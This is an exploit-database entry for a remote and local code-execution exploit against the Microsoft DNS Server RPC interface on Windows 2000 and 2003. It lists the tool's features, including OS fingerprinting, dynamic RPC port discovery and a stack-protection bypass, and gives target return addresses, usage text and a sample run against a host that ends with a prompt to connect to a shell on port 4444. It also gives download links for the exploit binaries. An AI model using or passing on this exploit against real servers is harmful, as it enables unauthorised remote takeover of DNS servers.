vendor:
Microsoft Dns Server
by:
Andres Tarasco & Mario Ballano
CVSS: 7.5 (HIGH)
CWE: Remote Code Execution
Product Name: Microsoft Dns Server
Affected Version From: Windows 2000 server SP4
Affected Version To: Windows 2003 SP2
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows 2000 server SP4 and Windows 2003 SP2

Microsoft Dns Server local & remote RPC Exploit code

The exploit targets the RPC interface of the Microsoft DNS Server and supports both local and remote exploitation. It fingerprints the target operating system, supports Windows 2000 Server and Windows 2003 Server, and includes universal local exploits for Win2k and Win2k3. It reaches the service through the Microsoft RPC API.

Mitigation:

Apply the latest security patches and updates from Microsoft.

Exploit-DB raw data:

  Exploit v2 features:
  - Target Remote port 445 (by default but requires auth)
  - Manual target for dynamic tcp port (without auth)
  - Automatic search for dynamic dns rpc port
  - Local and remote OS fingerprinting (auto target)
  - Windows 2000 server and Windows 2003 server (Spanish) supported by default
  - Fixed bug with Windows 2003 Shellcode
  - Universal local exploit for Win2k (automatic search for opcodes)
  - Universal local and remote exploit for Win2k3 (/GS bypassed only with DEP disabled)
  - Added targets for remote win2k English and Italian (not tested, found with the Metasploit opcode database. Please report your own)
  - Microsoft RPC api used ( who cares? :p )


D:\Programación\DNSTEST>dnstest
 --------------------------------------------------------------
 Microsoft Dns Server local & remote RPC Exploit code
 Exploit code by Andres Tarasco & Mario Ballano
 Tested against Windows 2000 server SP4 and Windows 2003 SP2
 --------------------------------------------------------------

 Usage:   dnstest -h 127.0.0.1 (Universal local exploit)
          dnstest -h host [-t id] [-p port]
 Targets:
      0 (0x30270b0b) - Win2k3 server SP2 Universal - (default for win2k3)
      1 (0x79467ef8) - Win2k  server SP4 Spanish -   (default for win2k )
      2 (0x7c4fedbb) - Win2k  server SP4 English
      3 (0x7963edbb) - Win2k  server SP4 Italian
      4 (0x41414141) - Windows all Denial of Service


D:\Programación\DNSTEST>dnstest.exe -h 192.168.1.2
 --------------------------------------------------------------
 Microsoft Dns Server local & remote RPC Exploit code
 Exploit code by Andres Tarasco & Mario Ballano
 Tested against Windows 2000 server SP4 and Windows 2003 SP2
 --------------------------------------------------------------

[+] Trying to fingerprint target.. (05.02)
[+] Remote Host identified as Windows 2003
[-] No port selected. Trying Ninja sk1llz
[+] Binding to ncacn_ip_tcp: 192.168.1.2
[+] Found 50abc2a4-574d-40b3-9d66-ee4fd5fba076 version 5.0
[+] RPC binding string: ncacn_ip_tcp:192.168.1.2[1105]
[+] Dynamic DNS rpc port found (1105)
[+] Connecting to 50abc2a4-574d-40b3-9d66-ee4fd5fba076@ncacn_ip_tcp:192.168.1.2[1105]
[+] RpcBindingFromStringBinding success
[+] Sending Exploit code to DnssrvOperation()
[+] Now try to connect to port 4444


Also available at:

http://514.es/Microsoft_Dns_Server_Exploit_v2.1.zip
http://www.48bits.com/exploits/dnsxpl.v2.1.zip
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/3746.zip (04172007-dnsxpl.v2.1.zip)

# milw0rm.com [2007-04-18]